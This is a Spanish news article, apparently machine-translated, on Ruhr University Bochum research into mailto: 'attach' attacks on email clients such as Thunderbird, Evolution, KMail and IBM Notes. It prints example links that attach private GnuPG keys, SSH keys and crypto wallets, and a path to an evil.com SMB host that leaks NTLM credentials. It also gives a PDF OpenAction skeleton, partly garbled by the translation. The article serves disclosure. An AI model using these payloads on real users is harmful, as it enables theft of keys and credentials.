Investigadores de la Universidad del Ruhr en Bochum (Alemania) () comportamiento de los clientes de correo al procesar enlaces “mailto:” con parámetros avanzados. Cinco de los veinte clientes de correo electrónico examinados eran vulnerables a un ataque que manipulaba la sustitución de recursos mediante el parámetro "adjuntar". Otros seis clientes de correo electrónico fueron vulnerables a un ataque de reemplazo de claves PGP y S/MIME, y tres clientes fueron vulnerables a un ataque para extraer el contenido de mensajes cifrados.
Enlaces ""se utilizan para automatizar la apertura de un cliente de correo electrónico para escribir una carta al destinatario especificado en el enlace. Además de la dirección, puede especificar parámetros adicionales como parte del enlace, como el asunto de la carta y una plantilla para el contenido típico. El ataque propuesto manipula el parámetro "adjuntar", que le permite adjuntar un archivo adjunto al mensaje generado.
Los clientes de correo Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) y Pegasus Mail fueron vulnerables a un ataque trivial que permite adjuntar automáticamente cualquier archivo local, especificado mediante un enlace como “mailto:?attach=path_to_file”. El archivo se adjunta sin mostrar ninguna advertencia, por lo que, sin especial atención, es posible que el usuario no se dé cuenta de que la carta se enviará con un archivo adjunto.
Por ejemplo, usando un enlace como “mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" puede insertar claves privadas de GnuPG en la carta. También puede enviar el contenido de carteras criptográficas (~/.bitcoin/wallet.dat), claves SSH (~/.ssh/id_rsa) y cualquier archivo accesible al usuario. Además, Thunderbird le permite adjuntar grupos de archivos mediante máscara utilizando construcciones como "attach=/tmp/*.txt".
Además de los archivos locales, algunos clientes de correo electrónico procesan enlaces al almacenamiento de red y rutas en el servidor IMAP. En particular, IBM Notes le permite transferir un archivo desde un directorio de red al procesar enlaces como "attach=\\evil.com\dummyfile", así como interceptar los parámetros de autenticación NTLM enviando un enlace a un servidor SMB controlado por el atacante. (la solicitud se enviará con los parámetros de autenticación del usuario actual).
Thunderbird procesa con éxito solicitudes como “attach=imap:///fetch>UID>/INBOX>1/”, que le permiten adjuntar contenido de carpetas en el servidor IMAP. Al mismo tiempo, los mensajes recuperados de IMAP, cifrados mediante OpenPGP y S/MIME, son descifrados automáticamente por el cliente de correo antes de enviarlos. Los desarrolladores de Thunderbird fueron sobre el problema en febrero y en el número el problema ya se ha solucionado (las ramas 52, 60 y 68 de Thunderbird siguen siendo vulnerables).
Las versiones antiguas de Thunderbird también eran vulnerables a otras dos variantes de ataque en PGP y S/MIME propuestas por los investigadores. En particular, Thunderbird, así como OutLook, PostBox, eM Client, MailMate y R2Mail2, fueron objeto de un ataque de reemplazo de claves, causado por el hecho de que el cliente de correo importa e instala automáticamente nuevos certificados transmitidos en mensajes S/MIME, lo que permite el atacante organizar la sustitución de las claves públicas ya almacenadas por el usuario.
El segundo ataque, al que son susceptibles Thunderbird, PostBox y MailMate, manipula las características del mecanismo de guardado automático de borradores de mensajes y permite, utilizando parámetros mailto, iniciar el descifrado de mensajes cifrados o la adición de una firma digital para mensajes arbitrarios, con posterior transmisión del resultado al servidor IMAP del atacante. En este ataque, el texto cifrado se transmite a través del parámetro "cuerpo" y la etiqueta "metaactualización" se utiliza para iniciar una llamada al servidor IMAP del atacante. Por ejemplo: ' '
Para procesar automáticamente enlaces "mailto:" sin interacción del usuario, se pueden utilizar documentos PDF especialmente diseñados: la acción OpenAction en PDF le permite iniciar automáticamente el controlador mailto al abrir un documento:
%PDF-1.5
1 0 objeto
<< /Tipo /Catálogo /AcciónAbierta [2 0 R] >>
endoobj
2 0 objeto
<< /Tipo /Acción /S /URI/URI (mailto:?body=——COMENZAR MENSAJE PGP——[…])>>
endoobj
Fuente: opennet.ru